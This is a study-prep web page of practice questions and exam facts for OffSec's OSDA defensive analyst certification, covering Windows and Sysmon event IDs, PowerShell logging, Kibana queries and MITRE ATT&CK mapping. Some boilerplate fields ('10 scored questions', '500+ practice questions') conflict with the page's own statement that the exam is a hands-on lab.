100+ Free OSDA Practice Questions

Pass your OffSec Defense Analyst (OSDA) exam on the first try — instant access, no signup required.

✓ No registration✓ No credit card✓ No hidden fees✓ Start practicing immediately

~60-70% first attempt (community estimate) Pass Rate

100+ Questions

100% Free

1 / 10

Question 1

Score: 0/0

A Windows security log entry with Event ID 4624 indicates which event?

A failed logon

A successful logon

A new account creation

A log cleared

to track

2026 Statistics

Key Facts: OSDA Exam

24 hrs

Exam Duration

OffSec (23h45m practical)

75/100

Passing Score

OffSec

Phases

OffSec (10 pts each)

$2,499

Learn One Price

OffSec annual

3 yrs

Validity

OffSec (since 2023)

200-level

Difficulty

OffSec foundational SOC

The OSDA exam is NOT multiple choice — it is a 23h45m hands-on detection lab with 10 phases (10 points each, 75 to pass) using pre-recorded attack logs in an Elastic SIEM, plus 24 hours for the report. You detect, document, and map attacker actions to MITRE ATT&CK. Our 100 practice questions on this site build the underlying knowledge (Event IDs, Sysmon, ATT&CK mapping, hunting queries) — they do NOT replicate the exam. Certification is valid 3 years.

Sample OSDA Practice Questions

Try these sample questions to test your OSDA exam readiness. Each question includes a detailed explanation. Start the interactive quiz above for the full 100+ question experience with AI tutoring.

1A Windows security log entry with Event ID 4624 indicates which event?

A.A failed logon

B.A successful logon

C.A new account creation

D.A log cleared

Explanation: Event ID 4624 records a successful logon, including LogonType (2 interactive, 3 network, 10 RemoteInteractive, etc.). 4625 is failed logon, 4720 is account creation, 1102 is log clear. Memorizing these IDs is foundational for OSDA-style SOC work.

2Which Sysmon event ID corresponds to 'Process Create' and is central to execution-tactic detection?

A.Event ID 1

B.Event ID 3

C.Event ID 11

D.Event ID 22

Explanation: Sysmon Event ID 1 (ProcessCreate) logs every new process along with command line, parent process, and hashes. Event 3 is network connection, 11 is file create, 22 is DNS query. Process creation events are the spine of almost every detection rule.

3Which MITRE ATT&CK tactic is associated with technique T1059 Command and Scripting Interpreter (e.g., PowerShell)?

A.Initial Access

B.Execution

C.Defense Evasion

D.Impact

Explanation: T1059 maps to the Execution tactic. Attackers use cmd.exe, PowerShell, bash, or other interpreters to run commands. Recognizing tactic/technique mapping is a major OSDA grading criterion — every detection must be mapped.

4Which Windows Event ID shows that a Windows event log was cleared — a common Defense Evasion indicator?

A.Event ID 1102

B.Event ID 4624

C.Event ID 4688

D.Event ID 5140

Explanation: Event ID 1102 in the Security log (and 104 in System) fires when the log is cleared — a strong Defense Evasion signal (T1070.001). 4624 is logon, 4688 is process create, 5140 is network share access.

5Which PowerShell logging event ID captures the actual script block content executed (including deobfuscated content)?

A.4103

B.4104

C.4697

D.5140

Explanation: Event ID 4104 (Microsoft-Windows-PowerShell/Operational) records script block content. 4103 captures module/pipeline events. Enabling ScriptBlockLogging (and MaxScriptBlockSize/Transcription) is essential to detect obfuscated PowerShell attacks.

6Which Windows Event ID indicates a new service was installed — often used for T1543.003 Persistence: Windows Service?

A.7045

B.4688

C.4624

D.5140

Explanation: Event ID 7045 in System log records new service installation including path and account. Variants 4697 also exist in Security. This is a bread-and-butter persistence detection. The others are unrelated IDs.

7Which Kibana/Elastic query language does the current OSDA-era SOC-200 primarily use?

A.SQL

B.KQL (Kibana Query Language) and Lucene syntax

C.PromQL

D.Splunk SPL

Explanation: OSDA's lab SIEM is Elastic Stack with Kibana. KQL is Kibana's simplified query language, backed by Lucene syntax for complex expressions. Splunk uses SPL, PromQL is for Prometheus, SQL is for relational DBs.

8Which Sysmon event ID logs a network connection from a process?

A.1

B.3

C.7

D.22

Explanation: Sysmon Event 3 (NetworkConnect) logs outbound network connections with process image, source/destination IP and port, and protocol. Crucial for C2 detection. Event 1 is process create, 7 is image load, 22 is DNS query.

9Which ATT&CK technique is reflected by PowerShell using `Get-WmiObject Win32_Process` to enumerate remote hosts?

A.T1047 Windows Management Instrumentation

B.T1021.001 RDP

C.T1090 Proxy

D.T1020 Automated Exfiltration

Explanation: WMI queries like Win32_Process remotely or locally map to T1047 WMI under the Execution/Discovery tactics depending on usage. T1021.001 is RDP lateral movement; T1090 is Proxy; T1020 is exfil.

10Which Windows Event ID captures special-privilege (admin) tokens assigned to a session at logon — often a precursor to Privilege Escalation detection?

A.4672

B.4624

C.4625

D.4688

Explanation: Event 4672 records 'Special privileges assigned to new logon' for accounts with sensitive privileges like SeDebugPrivilege, SeTcbPrivilege. Frequently paired with 4624 to filter high-privilege sessions. 4625 is failed, 4688 is process.

About the OSDA Exam

The OffSec Defense Analyst (OSDA) is OffSec's blue-team certification tied to the SOC-200 course. It validates the ability to detect, triage, and investigate attacker activity across the full MITRE ATT&CK kill chain using a SIEM (Elastic/Kibana), Windows event logs, Sysmon, PowerShell logging, and forensic artifacts.

Questions

10 scored questions

Time Limit

23 hours 45 minutes + 24 hours reporting

Passing Score

75/100 points (10 phases x 10 pts)

Exam Fee

$2,499 (Learn One annual subscription) (OffSec (Offensive Security))

OSDA Exam Content Outline

Core

SIEM & Log Analysis (Elastic/Kibana)

KQL/Lucene queries, Sigma rules, dashboard creation, log source integration, Windows Event Log (4624/4625/4688/4672/7045/1102), Sysmon events 1/3/7/11/13/22

Core

MITRE ATT&CK Framework

Mapping attacker actions to tactics/techniques: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, C2, Exfiltration, Impact

Core

Detection Engineering

PowerShell logging (ScriptBlock 4104, Transcription), ETW, process injection detection, lateral movement patterns (WMI/PSExec/WinRM/RDP), persistence (Run keys, services, scheduled tasks), C2 beaconing analysis

Core

Forensic Triage & Incident Response

Artifact analysis (prefetch, amcache, shimcache, UserAssist, Jump Lists), memory analysis (Volatility), network forensics (PCAP in Wireshark), IR playbooks, KAPE/Velociraptor

How to Pass the OSDA Exam

What You Need to Know

Passing score: 75/100 points (10 phases x 10 pts)
Exam length: 10 questions
Time limit: 23 hours 45 minutes + 24 hours reporting
Exam fee: $2,499 (Learn One annual subscription)

Keys to Passing

Complete 500+ practice questions
Score 80%+ consistently before scheduling
Focus on highest-weighted sections
Use our AI tutor for tough concepts

OSDA Study Tips from Top Performers

1Memorize core Windows Event IDs — 4624/4625/4688/4672/7045/1102 should be instant recall

2Know Sysmon event IDs 1, 3, 7, 11, 13, 22 cold — these are the bread and butter of detection

3Practice KQL/Lucene in a free Elastic instance — aggregations, regex matches, pivot queries

4Build a MITRE ATT&CK mental map: Discovery techniques look different from Lateral Movement

5Learn common C2 beaconing indicators: fixed interval + jitter, unusual TLS JA3, DNS TXT abuse

6Read real incident reports (Mandiant, CrowdStrike, Red Canary) to see how pros structure findings

7These are knowledge checks — the real exam is 24 hours of hands-on SIEM investigation

Frequently Asked Questions

Is the OSDA exam multiple choice?

No. The OSDA exam is a 23h45m hands-on SOC-analyst simulation. You work through pre-recorded logs in an Elastic SIEM (since the Sep 10, 2024 format update) across 10 phases. Each phase contains multiple attacker actions you must detect, document, and map to MITRE ATT&CK. Then you have 24 hours to submit a professional incident report. Our 100 practice questions build the knowledge (Event IDs, Sysmon, KQL, ATT&CK) — they do not replicate the exam.

What is the OSDA passing score?

You need 75 out of 100 points. The exam is split into 10 phases worth 10 points each. Each phase contains a number of attacker actions (enumeration, brute force, lateral movement, privilege escalation, persistence, etc.) that must be detected and documented to earn points.

Which SIEM does the OSDA use?

The current SOC-200 course and OSDA exam use an Elastic Stack (Elasticsearch + Kibana) deployment with Windows Event Log and Sysmon data. While the concepts of SIEM analysis apply broadly (Splunk, Sentinel, etc.), hands-on lab work is done in Elastic/Kibana, so KQL/Lucene query syntax matters.

What Windows Event IDs do I need to know for OSDA?

Core IDs: 4624 (logon), 4625 (failed logon), 4672 (special privileges), 4688 (process creation), 4697/7045 (service install), 1102 (log clear), 5140 (file share access), 4103/4104 (PowerShell ScriptBlock/Module logging). Sysmon: 1 (process), 3 (network connect), 7 (image load), 11 (file create), 13 (registry value set), 22 (DNS query). Our practice questions drill all of these.

Is OSDA entry-level?

OSDA is SOC-200-level — foundational in the OffSec SOC track. It assumes general IT knowledge and basic security concepts but does not require prior certifications. Community estimates put first-attempt pass rates in the 60-70% range for candidates who complete the SOC-200 labs.

How should I use these practice questions?

Treat them as knowledge validators for SOC-200 modules. Weak answers on Event ID meanings, Sysmon schema, KQL syntax, or ATT&CK technique mapping point you back to the course labs and the ATT&CK Navigator. The real exam rewards speed of pivoting through logs — knowledge is a prerequisite for that speed.